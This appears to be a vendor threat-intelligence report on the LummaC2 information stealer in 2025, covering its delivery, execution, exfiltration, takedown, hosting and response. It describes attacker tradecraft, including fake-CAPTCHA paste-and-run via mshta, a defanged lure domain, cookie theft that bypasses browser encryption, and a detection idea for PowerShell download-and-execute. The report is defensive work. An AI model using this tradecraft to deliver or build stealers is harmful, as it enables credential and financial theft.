LummaC2 in 2025

Initial access indicators of compromise (IOC) vary according to the delivery method and loader chosen by the adversary, so early detection telemetry differs from case to case. LummaC2 delivery vehicles have been presented to users in an array of creative ways, including:

• phishing emails
• drive-by downloads posing as browser updates
• fake CAPTCHAs
• masquerading as fake AI software

Popular LummaC2 loaders/crypters

• HijackLoader/IDAT Loader
• Legion Loader
• PrivateLoader

Adversaries have also used the same methods to deliver NetSupport Manager, Rhadamanthys, and StealC alongside LummaC2 on the same affected systems.

Paste and run in action

We described LummaC2’s paste-and-run tactic in our November 2024 Intelligence Insights, and paste and run remained a widespread tactic in 2025 to distribute multiple malware families.

In January 2025 we saw LummaC2 threats that began with the victim interacting with fake CAPTCHA-style paste-and-run lures. Successful paste-and-run execution resulted in mshta.exe reaching out to goatstuff[.]store to retrieve PowerShell.

While the atomic indicators for paste-and-run campaigns changed often in 2025, nearly every campaign leading to LummaC2 leveraged Mshta or PowerShell in some fashion, illustrating how adversaries tend to keep portions of their playbooks that “just work.”

The crypter connection

Behavioral detection of LummaC2 can vary quite a bit since it requires distributors to use crypters. Multiple detection analytics could catch LummaC2 simply because an adversary configured the crypter in a particular way. Crypters that we’ve observed paired with LummaC2 include PureCrypter and CypherIT.

Depending on the delivery method and adversary configurations, LummaC2 may be injected into a hollowed process—we’ve observed OpenWith.exe and more.com, among others—or leverage DLL side-loading for execution. The stealer activity occurs within memory with direct exfiltration to C2, however in some cases collected data may be staged in text files like System.txt prior to ZIP archiving for theft. This means that looking for C2 activity or suspicious TXT file creation may also help detect LummaC2. It does not maintain persistence on its own, however accompanying loaders or follow-on payloads may create and maintain persistence.

Emerging tradecraft

LummaC2 relies on HTTPS for exfiltration of data to adversary systems. In late 2023 to early 2024, the developers of the stealer migrated its exfiltration capabilities to use HTTPS over plaintext HTTP in an effort to to evade network-based detection controls. Along with using HTTPS for encrypted communications, LummaC2 developers also leverage Cloudflare services to make their exfiltration systems resilient and highly available.

As the stealer became more mature in 2024, LummaC2 incorporated more features to remain on the bleeding edge of the stealer market. To ensure data exfiltration even when interrupted, the LummaC2 developers included functionality to send information in piecemeal rather than doing the “collect, stage, send” technique. In addition, when Google implemented application bound encryption (ABE) in Chromium browsers, LummaC2 was rapid to adopt new techniques to obtain browser cookies and bypass ABE.

ABE experimentation continued into 2025, as we observed some instances of LummaC2 using the Chromium --remote-debugging-port technique used by other malware.

The takedown effects

Multiple community members and international law enforcement worked to take down LummaC2 infrastructure in May 2025, and this definitely affected LummaC2 operations. In our own data, we can observe Lumma’s peak in popularity earlier this year followed by a downturn after May.

Lummac2 detections in 2025

We observed low levels of LummaC2 in May and June 2025, followed by a solid effort in distribution for July and August. We’ve seen no instances of LummaC2 since October 2025.

Changes in LummaC2 network infrastructure

Details about infrastructure used by MaaS malware can often provide some insights into the malware’s operations and difficulties. In the case of LummaC2, we can observe changes in Autonomous System Numbers (ASNs) used to host or proxy LummaC2 before and after the takedown. To make this analysis possible, we used passive DNS records for LummaC2 exfiltration domains we observed from open source intelligence during 2025 with a cutoff date of December 30, 2025.

In the case of server hosting, we can see that LummaC2 domains from January to June 2025 almost exclusively resolved to Cloudflare IP addresses.

LummaC2 DNS-IP resolutions from January to June 2025

After June 2025, the DNS records show that Lumma’s operators likely diversified into multiple different hosting providers. While they still attempted to use Cloudflare, operators also explored at least seven hosting providers that are present on the Spamhaus Do Not Route or Peer (DROP) list, which catalogs sections of the internet that tend to fraudulent traffic:

• AEZA-AS (210644)
• AS-VD (47105, 203834)
• CHSN-AS (1997865)
• PROSPERO-AS (200593)
• PROTON66 (198953)
• ROUTERHOSTING (149956)
• ZHOUYISAT-COMMUNICATIONS (400992)

LummaC2 DNS-IP resolutions from June to December 2025

This trend suggests that Lumma infrastructure was pushed away from using legitimate infrastructure like Cloudflare into hosting providers on less savory portions of the Internet. As a result, organizations using network security tools similar to the DROP list are more likely to block LummaC2 traffic now than in the first half of 2025 before the takedown.

Prevention

Since LummaC2 has been distributed in so many different ways, preventative measures can take many approaches. We’ve observed LummaC2 distributed in malicious advertisements, fake software installations, paste-and-run campaigns, and more. We’ve also observed it delivered in script form, via DLL sideloads.

General preventative measures that apply to multiple malware families also help fight against LummaC2:

• Provide safe software installation sources for users
• Configure ad-blocking tools where possible
• Deploy endpoint security controls for detection and protection

Response

For response, an excellent playbook would look something like this:

1. Delete all components delivering LummaC2 from disk, removing persistence
2. Determine what account details are stored in the software on an affected system, including:
   • browsers
   • file transfer software like FileZilla and WinSCP
   • Telegram messaging
   • Steam gaming
   • cryptocurrency wallets
   • VPN profiles
   • cloud credentials in CLI tool configuration
   • sensitive files stored in the user’s Desktop and Documents folders
3. Once you determine the scope of data theft, take steps to reset any credentials stored on the system. This may also involve manually revoking sessions to prevent cookie reuse.
4. Finally, if financial details such as payment cards or cryptocurrency wallets are stored on the affected system, users may need to monitor the relevant accounts for unauthorized transactions.

PowerShell using invoke-expression to download content

This pseudo-detection analytic identifies instances of PowerShell using invoke-expression to download content from an HTTP URL. Adversaries attempting to deliver threats like LummaC2 use this function to download remotely hosted scripts and code for further exploitation of an endpoint. Note that legitimate package management and orchestration utilities like Chocolatey may use this function to update themselves.

Note: * is a placeholder for strings associated with legitimate use of this function in your environment